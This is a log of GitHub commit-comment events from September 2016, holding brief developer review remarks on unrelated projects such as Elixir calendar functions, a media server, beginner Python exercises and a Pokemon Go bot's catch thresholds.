{"id":"4578754259","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19067548,"position":5,"line":5,"path":"src/am/aca/ll/mediaPlayer/repository/interfaces/AlbumRepositoryInterface.java","commit_id":"e938edfb9abfe3b680a6ee41aed111951f05da09","created_at":"2016-09-17T22:09:50Z","updated_at":"2016-09-17T22:09:50Z","body":"interfaci methodner@ togh exceptioner qcen\r\norinak \r\nAlbum edit(Album album) throws InvalidBeanException;\r\nException en depqum qci vor orinak album em uzum edit anem bayc et album i id ov album chka mer bazayum.\r\nNuyn el mius methodneri hamar."}},"created_at":"2016-09-17T22:09:50Z"}
{"id":"4578754956","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19067551,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T22:10:20Z","updated_at":"2016-09-17T22:10:20Z","body":"@alfaproject He did everything correctly, 1024 inclusive is JPEG_MED.\r\nFeel free to read IEC 62481-2."}},"created_at":"2016-09-17T22:10:20Z"}
{"id":"4578755139","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19067552,"position":null,"line":null,"path":null,"commit_id":"e938edfb9abfe3b680a6ee41aed111951f05da09","created_at":"2016-09-17T22:10:29Z","updated_at":"2016-09-17T22:10:29Z","body":"Es angam shat lav eir grel apres. "}},"created_at":"2016-09-17T22:10:29Z"}
{"id":"4578755730","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19067557,"position":12,"line":12,"path":"nathan-programming-puzzles-9-2.py","commit_id":"6df3b2b9644839387253e0ab4c6245cc8c894dba","created_at":"2016-09-17T22:10:56Z","updated_at":"2016-09-17T22:10:56Z","body":"I don't think you're supposed to be printing x.  What are you supposed to print?"}},"created_at":"2016-09-17T22:10:56Z"}
{"id":"4578756055","type":"CommitCommentEvent","actor":{"login":"emanuele45"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19067559,"position":null,"line":null,"path":null,"commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-17T22:11:10Z","updated_at":"2016-09-17T22:11:10Z","body":"Does bf3894feb2ba43560a6692e99bf0e88ecd98b048 work?"}},"created_at":"2016-09-17T22:11:10Z"}
{"id":"4578758568","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19067566,"position":12,"line":12,"path":"nathan-programming-puzzles-9-2.py","commit_id":"6df3b2b9644839387253e0ab4c6245cc8c894dba","created_at":"2016-09-17T22:13:04Z","updated_at":"2016-09-17T22:13:04Z","body":"What happened to puzzle 9.3?  It's different, and important."}},"created_at":"2016-09-17T22:13:04Z"}
{"id":"4578758859","type":"CommitCommentEvent","actor":{"login":"victorbond219"},"repo":{"name":"aerosportsinternational/aeroholodeck"},"payload":{"comment":{"id":19067567,"position":null,"line":null,"path":null,"commit_id":"b0a908b5d4c2e03ecb3a688d3f4de6155152960a","created_at":"2016-09-17T22:13:20Z","updated_at":"2016-09-17T22:13:20Z","body":"This is the tutorial stage of this project... working through Microsoft HoloLens documentation and provisioning for development and testing."}},"created_at":"2016-09-17T22:13:20Z"}
{"id":"4578760385","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067577,"position":34,"line":19,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"9d2f96feca5b90a75b20e27da1a57f0989dc1773","created_at":"2016-09-17T22:14:34Z","updated_at":"2016-09-17T22:14:34Z","body":"Avoid using tag selectors."}},"created_at":"2016-09-17T22:14:34Z"}
{"id":"4578760985","type":"CommitCommentEvent","actor":{"login":"gu3st"},"repo":{"name":"odota/core"},"payload":{"comment":{"id":19067579,"position":5,"line":63,"path":"svc/requests.js","commit_id":"3976750aa67122e937c1a0e1a022965928e27a57","created_at":"2016-09-17T22:14:59Z","updated_at":"2016-09-17T22:14:59Z","body":"Isn't this one somewhat redundant, as you can't return a val from a setInterval? "}},"created_at":"2016-09-17T22:14:59Z"}
{"id":"4578761225","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067582,"position":54,"line":31,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"9d2f96feca5b90a75b20e27da1a57f0989dc1773","created_at":"2016-09-17T22:15:09Z","updated_at":"2016-09-17T22:15:09Z","body":"Indentation."}},"created_at":"2016-09-17T22:15:09Z"}
{"id":"4578763445","type":"CommitCommentEvent","actor":{"login":"sbeatz"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067593,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-17T22:16:43Z","updated_at":"2016-09-17T22:16:43Z","body":"twisted.Enterprise is missing in this uplift so this is leading to an incomplete twisted package!"}},"created_at":"2016-09-17T22:16:43Z"}
{"id":"4578764242","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/core"},"payload":{"comment":{"id":19067595,"position":5,"line":63,"path":"svc/requests.js","commit_id":"3976750aa67122e937c1a0e1a022965928e27a57","created_at":"2016-09-17T22:17:17Z","updated_at":"2016-09-17T22:17:17Z","body":"I'm not sure.  I was seeing a lot of spam in the request logs about not returning promises, so I just threw these in and it stopped complaining."}},"created_at":"2016-09-17T22:17:17Z"}
{"id":"4578766245","type":"CommitCommentEvent","actor":{"login":"yukulele"},"repo":{"name":"yukulele/google-image"},"payload":{"comment":{"id":19067606,"position":null,"line":null,"path":null,"commit_id":"c5f6e1e9c3e641b27d5fac639c72f86ad8bbaa11","created_at":"2016-09-17T22:18:53Z","updated_at":"2016-09-17T22:18:53Z","body":"https://github.com/jtojnar/google-image/pull/2"}},"created_at":"2016-09-17T22:18:53Z"}
{"id":"4578766658","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19067608,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-17T22:19:13Z","updated_at":"2016-09-17T22:19:13Z","body":"Oh, I like the fast track idea because I was worried about performance. Let\nme play with those ideas tomorrow and I will follow up.\n\nOn the other hand, to play devils advocate on still having something like\nto_unix here, the UNIX epoch is pervasive in other parts of Elixir, such as\nthe System time functions. So having a more direct way of converting a\nNaiveDateTime to the System time formats (seconds, microseconds, etc) is\nprobably still a good idea.\n\nOn Saturday, September 17, 2016, Lau Taarnskov <notifications@github.com>\nwrote:\n\n> I think I might have come to the same conclusion as you with having diff\n> functions instead of specific to_gregorian functions. For instance to get\n> gregorian seconds for a NaiveDateTime just use a diff function and pass ~N[0000-01-01\n> 00:00:00]. 👍 I think that is a good idea. So to_gregorian_seconds is not\n> strictly necessary. In the docs of a diff function there could be an\n> example with the gregorian epoch. It might make sense to have \"fast track\"\n> function definitions for diff matching on the gregorian epoch.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/elixir-lang/elixir/commit/e50735ff2a7c16cc7705d8fa59af906e986c19f7#commitcomment-19067334>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAlbheZh6XbJ8XhcSGxh4rr9BsGuLaTks5qrFvogaJpZM4J9T_e>\n> .\n>\n\n\n-- \n\n\n*José Valimwww.plataformatec.com.br\n<http://www.plataformatec.com.br/>Founder and Director of R&D*\n"}},"created_at":"2016-09-17T22:19:13Z"}
{"id":"4578766691","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19067610,"position":null,"line":null,"path":null,"commit_id":"50315f59da4b448864730f65f730d4e8fe34e08d","created_at":"2016-09-17T22:19:16Z","updated_at":"2016-09-17T22:19:16Z","body":"@Nadahar cool, nice work :)"}},"created_at":"2016-09-17T22:19:16Z"}
{"id":"4578766882","type":"CommitCommentEvent","actor":{"login":"camilonova"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19067612,"position":null,"line":null,"path":null,"commit_id":"56fb550044f004805429f0e70bd3e92ce55845af","created_at":"2016-09-17T22:19:27Z","updated_at":"2016-09-17T22:19:27Z","body":"Sorry about that. Rolling back."}},"created_at":"2016-09-17T22:19:27Z"}
{"id":"4578767220","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19067614,"position":5,"line":5,"path":"stick-man-puzzle-1/stick-man.py","commit_id":"65d2fd6347d7771352218167fc7bf1dc1c5bede7","created_at":"2016-09-17T22:19:47Z","updated_at":"2016-09-17T22:19:47Z","body":"This file doesn't run for me.  It has the `Sprite.move()` that we fixed last night.  Did you remember to check in and push?"}},"created_at":"2016-09-17T22:19:47Z"}
{"id":"4578768035","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19067618,"position":5,"line":5,"path":"stick-man-puzzle-2/stick-man.py","commit_id":"65d2fd6347d7771352218167fc7bf1dc1c5bede7","created_at":"2016-09-17T22:20:29Z","updated_at":"2016-09-17T22:20:29Z","body":"This one also doesn't run for me.  Same error."}},"created_at":"2016-09-17T22:20:29Z"}
{"id":"4578768753","type":"CommitCommentEvent","actor":{"login":"rhinton"},"repo":{"name":"nrhint/python-class"},"payload":{"comment":{"id":19067625,"position":5,"line":5,"path":"stick-man-puzzle-3/stick-man.py","commit_id":"65d2fd6347d7771352218167fc7bf1dc1c5bede7","created_at":"2016-09-17T22:21:03Z","updated_at":"2016-09-17T22:21:03Z","body":"Also doesn't work for me."}},"created_at":"2016-09-17T22:21:03Z"}
{"id":"4578769239","type":"CommitCommentEvent","actor":{"login":"krisherod"},"repo":{"name":"krisherod/newGitTest"},"payload":{"comment":{"id":19067631,"position":null,"line":null,"path":null,"commit_id":"e3009df386cb1321db05f608e5eb7cd27546afdd","created_at":"2016-09-17T22:21:26Z","updated_at":"2016-09-17T22:21:26Z","body":"lets commit this"}},"created_at":"2016-09-17T22:21:26Z"}
{"id":"4578770415","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067634,"position":null,"line":null,"path":null,"commit_id":"9d2f96feca5b90a75b20e27da1a57f0989dc1773","created_at":"2016-09-17T22:22:16Z","updated_at":"2016-09-17T22:22:16Z","body":"The exercises **2.5.2 Layout systems** and **2.6 Media queries** are missing. Please, finish them before continuing with the next Topic."}},"created_at":"2016-09-17T22:22:16Z"}
{"id":"4578771579","type":"CommitCommentEvent","actor":{"login":"Spuds"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19067642,"position":null,"line":null,"path":null,"commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-17T22:23:13Z","updated_at":"2016-09-17T22:23:13Z","body":"I think so, yes ... should it do an updatesettings as well to reset the ACP value ?"}},"created_at":"2016-09-17T22:23:13Z"}
{"id":"4578772715","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19067645,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T22:24:09Z","updated_at":"2016-09-17T22:24:09Z","body":"See also [#15568](http://hub.qgis.org/issues/15568)"}},"created_at":"2016-09-17T22:24:09Z"}
{"id":"4578776715","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19067664,"position":null,"line":null,"path":null,"commit_id":"f9219b3bdbcf906f43afa140479141f06d1ed68a","created_at":"2016-09-17T22:27:19Z","updated_at":"2016-09-17T22:27:19Z","body":"Thanks @jef-n!"}},"created_at":"2016-09-17T22:27:19Z"}
{"id":"4578777698","type":"CommitCommentEvent","actor":{"login":"bwildenhain"},"repo":{"name":"eulenfunk/fastd-peers"},"payload":{"comment":{"id":19067667,"position":4,"line":2,"path":"nefmet/met0","commit_id":"b7378a0d9f5d3eef79e62deaa58991c217bb4975","created_at":"2016-09-17T22:28:09Z","updated_at":"2016-09-17T22:28:09Z","body":"Danke für den Hinweis, hab's korrigiert."}},"created_at":"2016-09-17T22:28:09Z"}
{"id":"4578778206","type":"CommitCommentEvent","actor":{"login":"JoeDThomas"},"repo":{"name":"JoeDThomas/Practice-on-Python"},"payload":{"comment":{"id":19067668,"position":2,"line":2,"path":"Task 2.py","commit_id":"b34213c561759305404f5a94b0b522b29a5ca03b","created_at":"2016-09-17T22:28:33Z","updated_at":"2016-09-17T22:28:33Z","body":"# comparison of quantitative value. If fileA>fileB, outputs 1. If fileA<fileB, outputs -1. Equivalent values = 0."}},"created_at":"2016-09-17T22:28:33Z"}
{"id":"4578779372","type":"CommitCommentEvent","actor":{"login":"dsherret"},"repo":{"name":"dsherret/ts-nameof"},"payload":{"comment":{"id":19067673,"position":null,"line":null,"path":null,"commit_id":"53527b81dfb9e85a610c01d2600a1e2011191b48","created_at":"2016-09-17T22:29:30Z","updated_at":"2016-09-17T22:29:30Z","body":"This commit is for #3."}},"created_at":"2016-09-17T22:29:30Z"}
{"id":"4578781480","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19067680,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T22:31:03Z","updated_at":"2016-09-17T22:31:03Z","body":"@Sami32 It seems you're correct. What a strange way to define standard though."}},"created_at":"2016-09-17T22:31:03Z"}
{"id":"4578784417","type":"CommitCommentEvent","actor":{"login":"Be-ing"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19067687,"position":null,"line":null,"path":null,"commit_id":"bac0ff9fd4138dd89d623935f3b3e36c22226bd4","created_at":"2016-09-17T22:33:15Z","updated_at":"2016-09-17T22:33:15Z","body":"What version of Qt are you building with? Support for this constructor was added in Qt 4.8."}},"created_at":"2016-09-17T22:33:15Z"}
{"id":"4578785114","type":"CommitCommentEvent","actor":{"login":"williamd1k0"},"repo":{"name":"godotengine/godot-demo-projects"},"payload":{"comment":{"id":19067689,"position":null,"line":null,"path":null,"commit_id":"10fcf1629ba8e27f9068ca13f207d1255ce9acdb","created_at":"2016-09-17T22:33:45Z","updated_at":"2016-09-17T22:33:45Z","body":"I'm commenting here because this does not need a PR.\r\nNeed to remove the Return key in `jump1` keymap because the player 1 is shooting and jumping at the same time.\r\nThanks."}},"created_at":"2016-09-17T22:33:45Z"}
{"id":"4578788989","type":"CommitCommentEvent","actor":{"login":"m3047"},"repo":{"name":"m3047/dnspython"},"payload":{"comment":{"id":19067700,"position":null,"line":null,"path":null,"commit_id":"a6cbeaffb6da7fe6f7faa6a9097a466e74c43ebb","created_at":"2016-09-17T22:36:21Z","updated_at":"2016-09-17T22:36:21Z","body":"This is the test for the change to dns.resolver. I can't find a way to roll this back or combine the two commits."}},"created_at":"2016-09-17T22:36:21Z"}
{"id":"4578789345","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19067701,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-17T22:36:36Z","updated_at":"2016-09-17T22:36:36Z","body":"which extension or plugin uses Enterprise?\r\nI just split it out as none used it and it was rather large. We can add python-twisted-enterprise to rdepends or re-include those files any time."}},"created_at":"2016-09-17T22:36:36Z"}
{"id":"4578789637","type":"CommitCommentEvent","actor":{"login":"danielsdeleo"},"repo":{"name":"chef/chef"},"payload":{"comment":{"id":19067702,"position":18,"line":127,"path":"lib/chef/mixin/deep_merge.rb","commit_id":"0df84a5ccc41e4bca12990f0b4a708a24fc56d52","created_at":"2016-09-17T22:36:48Z","updated_at":"2016-09-17T22:36:48Z","body":"nj need u"}},"created_at":"2016-09-17T22:36:48Z"}
{"id":"4578793413","type":"CommitCommentEvent","actor":{"login":"Joanmarie"},"repo":{"name":"Spec-Ops/web-platform-tests"},"payload":{"comment":{"id":19067718,"position":null,"line":null,"path":null,"commit_id":"8af1fa2d39c955df483c7827c2ee19b5cd6f6424","created_at":"2016-09-17T22:39:31Z","updated_at":"2016-09-17T22:39:31Z","body":"(The to-do-soon relation support has just been committed to this branch.)"}},"created_at":"2016-09-17T22:39:31Z"}
{"id":"4578794639","type":"CommitCommentEvent","actor":{"login":"joshbuchea"},"repo":{"name":"joshbuchea/HEAD"},"payload":{"comment":{"id":19067722,"position":null,"line":null,"path":null,"commit_id":"4cd6e5ce9b80dd1b12afadcfbee5f046afeedca7","created_at":"2016-09-17T22:40:17Z","updated_at":"2016-09-17T22:40:17Z","body":"*Hope* would have been a more appropriate word than *assume*, but point taken @dodekeract 👍 "}},"created_at":"2016-09-17T22:40:17Z"}
{"id":"4578796089","type":"CommitCommentEvent","actor":{"login":"Bnnemer"},"repo":{"name":"Bnnemer/Bnnemer"},"payload":{"comment":{"id":19067726,"position":null,"line":null,"path":null,"commit_id":"2aafc64e654b1cf3d0a8093ce7c757ea0b985c0a","created_at":"2016-09-17T22:41:18Z","updated_at":"2016-09-17T22:41:18Z","body":"first"}},"created_at":"2016-09-17T22:41:18Z"}
{"id":"4578796528","type":"CommitCommentEvent","actor":{"login":"GitHubJoin24"},"repo":{"name":"GitHubJoin24/HelloWorld"},"payload":{"comment":{"id":19067728,"position":null,"line":null,"path":null,"commit_id":"746903a65f5f6607aef3917b765fe45a350aca03","created_at":"2016-09-17T22:41:33Z","updated_at":"2016-09-17T22:41:33Z","body":"no comment\r\n"}},"created_at":"2016-09-17T22:41:33Z"}
{"id":"4578796698","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19067729,"position":8,"line":21,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-17T22:41:41Z","updated_at":"2016-09-17T22:41:41Z","body":"@blacky0x0: Thanks for feedback. Before I proceed with this, can you explain what exactly are you trying to achieve?"}},"created_at":"2016-09-17T22:41:41Z"}
{"id":"4578800262","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19067736,"position":null,"line":null,"path":null,"commit_id":"61baab44a12a6cfa6c923af53e127b4ab3162428","created_at":"2016-09-17T22:44:06Z","updated_at":"2016-09-17T22:44:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BEVthkBR&#x2F;28-polls-error-in-block-display\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Polls - Error in Block Display</a>"}},"created_at":"2016-09-17T22:44:06Z"}
{"id":"4578800978","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19067737,"position":null,"line":null,"path":null,"commit_id":"648e1eefa223c9c4b839b10b27d6ce94ad34fe08","created_at":"2016-09-17T22:44:35Z","updated_at":"2016-09-17T22:44:35Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dMbr5XvL&#x2F;37-polls-plugin-voter-table-has-incorrect-topic-length\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Polls Plugin - Voter table has incorrect topic length</a>"}},"created_at":"2016-09-17T22:44:35Z"}
{"id":"4578801073","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19067739,"position":null,"line":null,"path":null,"commit_id":"7620976826e059e3d8c24f3d7e5a8878b2d541a6","created_at":"2016-09-17T22:44:39Z","updated_at":"2016-09-17T22:44:39Z","body":"@Crayon2000, Can you test this change under Borland? I want to ensure it did not knock something loose.\r\n\r\nAlso see [Issue 277: Cut-over to CRYPTOPP_ASSERT due to CVE-2016-7420](http://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-17T22:44:39Z"}
{"id":"4578801563","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19067743,"position":null,"line":null,"path":null,"commit_id":"73dd2f97b7c491ce72759540bee7d0abc56d9a68","created_at":"2016-09-17T22:45:02Z","updated_at":"2016-09-17T22:45:02Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;6voYGYx3&#x2F;40-media-gallery-mp3-bug\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Media Gallery MP3 Bug</a>"}},"created_at":"2016-09-17T22:45:02Z"}
{"id":"4578801787","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19067744,"position":null,"line":null,"path":null,"commit_id":"6a4e62923501255b8f0feece39a9a21810eb9a52","created_at":"2016-09-17T22:45:14Z","updated_at":"2016-09-17T22:45:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;kPjnRAaI&#x2F;39-incorrect-message-displayed-when-saving-exif-ipct-data\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Incorrect Message displayed when saving EXIF &#x2F; IPCT data</a>"}},"created_at":"2016-09-17T22:45:14Z"}
{"id":"4578802140","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19067746,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T22:45:27Z","updated_at":"2016-09-17T22:45:27Z","body":"> How did you find it?\r\n\r\n@nirvn bisected to the offending commit"}},"created_at":"2016-09-17T22:45:27Z"}
{"id":"4578802364","type":"CommitCommentEvent","actor":{"login":"esbrandt"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19067747,"position":null,"line":null,"path":null,"commit_id":"bac0ff9fd4138dd89d623935f3b3e36c22226bd4","created_at":"2016-09-17T22:45:36Z","updated_at":"2016-09-17T22:45:36Z","body":"```bash\r\n$ brew info qt\r\nqt: stable 4.8.7 (bottled), HEAD\r\nCross-platform application and UI framework\r\nhttps://www.qt.io/\r\n```\r\nCurrently downloading Xcode update, i´ll report later if this solves the issue."}},"created_at":"2016-09-17T22:45:36Z"}
{"id":"4578805224","type":"CommitCommentEvent","actor":{"login":"YuJungK"},"repo":{"name":"YuJungK/-hello-world"},"payload":{"comment":{"id":19067755,"position":null,"line":null,"path":null,"commit_id":"fccf2140578e4e64cf8c52a24b86bf2a3edad21e","created_at":"2016-09-17T22:47:47Z","updated_at":"2016-09-17T22:47:47Z","body":"Content for non-telepathic human"}},"created_at":"2016-09-17T22:47:47Z"}
{"id":"4578805806","type":"CommitCommentEvent","actor":{"login":"mwhittaker"},"repo":{"name":"jssmith/db.cs.berkeley.edu"},"payload":{"comment":{"id":19067757,"position":null,"line":null,"path":null,"commit_id":"7c22cfcec6af76f78be02c7a7347910ef3029ce3","created_at":"2016-09-17T22:48:11Z","updated_at":"2016-09-17T22:48:11Z","body":":smile: "}},"created_at":"2016-09-17T22:48:11Z"}
{"id":"4578809113","type":"CommitCommentEvent","actor":{"login":"japokmn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19067765,"position":53,"line":297,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"a45943e061e4936b56f21f71f6ff39398e24af52","created_at":"2016-09-17T22:50:32Z","updated_at":"2016-09-17T22:50:32Z","body":"Changing this from > to >= makes it so that if you don't specify catch_above_iv in your config, all pokemon are viewed as vip..."}},"created_at":"2016-09-17T22:50:32Z"}
{"id":"4578809187","type":"CommitCommentEvent","actor":{"login":"japokmn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19067766,"position":46,"line":292,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"a45943e061e4936b56f21f71f6ff39398e24af52","created_at":"2016-09-17T22:50:33Z","updated_at":"2016-09-17T22:50:33Z","body":"Having these both as <= instead of < makes it so that all pokemon are viewed as vip if both values aren't specified in configs/config.json\r\n\r\nBasically, if neither are specified it becomes pokemon.cp <= pokemon.cp <= pokemon.cp which will always be true\r\n\r\nIf only one is specified it becomes \"pokemon.cp <= pokemon.cp <= x\" or \"y <= pokemon.cp <= pokemon.cp\", which is equally wrong."}},"created_at":"2016-09-17T22:50:33Z"}
{"id":"4578809192","type":"CommitCommentEvent","actor":{"login":"japokmn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19067767,"position":39,"line":287,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"a45943e061e4936b56f21f71f6ff39398e24af52","created_at":"2016-09-17T22:50:35Z","updated_at":"2016-09-17T22:50:35Z","body":"Changing this from > to >= makes it so that if you don't specify catch_above_ncp in your config, all pokemon are viewed as vip..."}},"created_at":"2016-09-17T22:50:35Z"}
{"id":"4578810000","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":19067768,"position":16,"line":16,"path":"src/Util/LetIn.v","commit_id":"fa0db09b0d91a76eec2f77bbb50815516feaf864","created_at":"2016-09-17T22:51:07Z","updated_at":"2016-09-17T22:51:07Z","body":"Why phrase it this way, rather than as `Proper (RA ==> (RA ==> RB) ==> RB) Let_In`?"}},"created_at":"2016-09-17T22:51:07Z"}
{"id":"4578810355","type":"CommitCommentEvent","actor":{"login":"japokmn"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":19067769,"position":39,"line":287,"path":"pokemongo_bot/cell_workers/pokemon_catch_worker.py","commit_id":"a45943e061e4936b56f21f71f6ff39398e24af52","created_at":"2016-09-17T22:51:21Z","updated_at":"2016-09-17T22:51:21Z","body":"I changed these back to > in my local branch and it fixes the issue. Otherwise, all pokemon were being treated as vip and were being thrown razzberries and ultraballs."}},"created_at":"2016-09-17T22:51:21Z"}
{"id":"4578811318","type":"CommitCommentEvent","actor":{"login":"timurkashapov"},"repo":{"name":"AxAmat/JSchool.hh.ru"},"payload":{"comment":{"id":19067770,"position":null,"line":null,"path":null,"commit_id":"622731cb64a84b457477106aab352e153c87f367","created_at":"2016-09-17T22:52:04Z","updated_at":"2016-09-17T22:52:04Z","body":"Супер лаконично 👍 "}},"created_at":"2016-09-17T22:52:04Z"}
{"id":"4578811628","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"oe-alliance/AutoBouquetsMaker"},"payload":{"comment":{"id":19067773,"position":null,"line":null,"path":null,"commit_id":"86fbb03d4a73525b615a09408148d45a50b3fa31","created_at":"2016-09-17T22:52:18Z","updated_at":"2016-09-17T22:52:18Z","body":"There is another provider with only one region. That one also has the region the same as the provider name, this is why I changed it.  If you still want it changed, I'll change it back, it won't make any difference as you cannot select a different region, there is only one region.\r\n\r\nThe tuner configuration is checked prior to offering you providers. I would suggest using a unique provider name if/when we find 5W one.\r\n\r\nIf you can provide specific instruction on what to do for the 5W provider, maybe someone with access to the satellite can assist. \r\n\r\n "}},"created_at":"2016-09-17T22:52:18Z"}
{"id":"4578813288","type":"CommitCommentEvent","actor":{"login":"heny-tanu-halim"},"repo":{"name":"xingzhaoo/eecs4314"},"payload":{"comment":{"id":19067777,"position":6,"line":8,"path":"README.md","commit_id":"ec83efa881c976346050117bf7ae56e28b29a490","created_at":"2016-09-17T22:53:30Z","updated_at":"2016-09-17T22:53:30Z","body":"Sied Hoa (Heny) Tjin, yu238294, 203676368"}},"created_at":"2016-09-17T22:53:30Z"}
{"id":"4578814826","type":"CommitCommentEvent","actor":{"login":"erickpablo"},"repo":{"name":"erickpablo/Game"},"payload":{"comment":{"id":19067784,"position":null,"line":null,"path":null,"commit_id":"e88e9a7a87ca4d000def0d610519821ba2d6bd18","created_at":"2016-09-17T22:54:36Z","updated_at":"2016-09-17T22:54:36Z","body":"Já iniciamos nosso projeto, Zombie Invasion e o plano de fundo já está sendo definido, Segue o anexo da imagem."}},"created_at":"2016-09-17T22:54:36Z"}
